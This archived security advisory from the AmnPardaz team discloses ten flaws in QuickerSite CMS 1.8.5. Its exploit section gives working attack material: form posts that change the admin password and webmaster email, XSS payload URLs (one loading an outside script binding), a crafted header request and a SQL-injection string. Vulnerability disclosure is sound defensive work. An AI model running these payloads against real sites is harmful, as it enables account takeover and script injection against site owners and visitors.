AOH :: HP Unsorted Q :: BX3399.HTM

QuickerSite Multiple Vulnerabilities



QuickerSite Multiple Vulnerabilities
QuickerSite Multiple Vulnerabilities



########################## www.BugReport.ir #######################################
#
#               AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################

####################
1. Description:
####################
        QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1000 visitors/day).
####################
2. Vulnerabilities:
####################
        2.1. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can change admin password.
                2.1.1. Exploit:
                                Check the exploit section.
        2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info., such as admin email address.
                2.2.1. Exploit:
                                Check the exploit section.
        2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
                2.3.1. Exploit:
                                Check the exploit section.
        2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
                2.4.1. Exploit:
                                Check the exploit section.
        2.5. Cross Site Scripting (XSS) [in "showThumb.aspx"]. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).
                2.5.1. Exploit:
                                Check the exploit section.
        2.6. Cross Site Scripting (XSS), Failure to Restrict URL Access [in "process_send.asp"]. Redirect Reflected XSS Attack In "SB_redirect" parameter. Reflected XSS, Content Spoofing In "SB_feedback" parameter. Everyone can mailbomb others.
                2.6.1. Exploit:
                                Check the exploit section.
        2.7. Cross Site Scripting (XSS) [in "picker.asp"]. Reflected XSS attack in "paramCode" and "cColor" parameters.
                2.7.1. Exploit:
                                Check the exploit section.
        2.8. Cross Site Scripting (XSS) [in "rss.asp"]. Stored XSS attack in "X-FORWARDED-FOR","QueryString","Referer"" header parameter. Attacker can execute an XSS against Admin.
                2.8.1. Exploit:
                                Check the exploit section.
        2.9. File uploading is allowed by FCKEDITOR.
                2.9.1. Exploit:
                                Check the exploit section.
        2.10. Injection Flaws [in "/asp/includes/contact.asp"]. SQL Injection on "check" function in "sNickName" parameter.
                2.10.1. Exploit:
                                Check the exploit section.
####################
3. Exploits:
####################
Original Exploit URL: http://bugreport.ir/index.php?/39/exploit

        3.1. Everyone can change admin password.
                -------------
action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post"> adminPassword:
adminPasswordConfirm:
------------- 3.2. Everyone can edit all the site info., such as admin email address. -------------
action="http://[URL]/asp/bs_login.asp?btnAction=saveAdmin" method="post"> Site Url: value="http://www.VICTIM.com" size="100" />
Site AlternateDomains: value="http://www.VICTIM-Backup.com" size="100" />
Description:
Site Name:
Site Title:
CopyRight:
Keywords:
Google Analytics:
Language:
DatumFormat:
Webmaster:
Webmaster Email: value="MyEmail-ResetPassword@Hacker.Com" size="100" />
Default RSS Link: value="http://www.VICTIM.com/RSS.asp" size="100" />
------------- 3.3. Everyone can edit all the site design. -------------
action="http://[URL]/asp/bs_login.asp?btnAction=saveDesign" method="post"> siteWidth:
menuWidth:
bgColorSides:
bgImageLeft:
bgImageRight:
mainBGColor:
mainBgImage:
scheidingsLijnColor:
scheidingsLijnWidth:
menuBGColor:
menuBGImage:
menuBorderColor:
MenuHoverBGColor:
subMenuBorderColor:
fontType:
fontColor:
linkColor:
fontSize:
fontWeight:
publicIconColor:
publicIconColorHover:
siteAlign:
menuLocation:
------------- 3.4. Everyone can mailbomb others. -------------
action="http://[URL]/mailPage.asp?iId=HILHG" method="post">
------------- 3.5. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode). ------------- http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS")) (IE) http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (Mozilla) http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS"));-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (IE+Mozilla) http://[URL]/showThumb.aspx (Path disc.) ------------- 3.6. Redirect Reflected XSS Attack In "SB_redirect" parameter in "process_send.asp". Reflected XSS, Content Spoofing In "SB_feedback" parameter in "process_send.asp". Everyone can mailbomb others. -------------
action="http://[URL]/default.asp?iId=HILHG&pageAction=send" method="post"> MailTo:
Subject:
Messgae:
SB_feedback:
SB_redirect:
------------- 3.7. Reflected XSS attack in "paramCode" and "cColor" parameters in "picker.asp" ------------- http://[URL]/asp/colorpicker/picker.asp?paramCode=pickerPanel.value=''};alert('XSS')">http://[URL]/asp/colorpicker/picker.asp?cColor=irsdl ------------- 3.8. Stored XSS attack in "X-FORWARDED-FOR","QueryString","Referer"" header parameter. Attacker can execute an XSS against Admin. ------------- Header must like this: GET /rss.asp?iId=IHJEF&s="'> HTTP/1.1 Host: [URL] User-Agent: Not Referer: FooNotSite.com"'> X-FORWARDED-FOR: "'> ACCEPT-LANGUAGE: test Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive ------------- 3.9. File uploading is allowed by FCKEDITOR. -------------
action="http://[URL]/fckeditor251/editor/filemanager/connectors/asp/upload.asp" method="post">
------------- 3.10. SQL Injection on "check" function in "sNickName" parameter. ------------- http://[URL]/default.asp?pageAction=profile Change "Nickname" to "'or'1'='1" and "'or'1'='2" and see the results ------------- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitized for 3.5, 3.6, 3.7, 3.8, 3.10, And use access control for others. Note: First check the vendor and look for the patch. #################### - Credit : #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.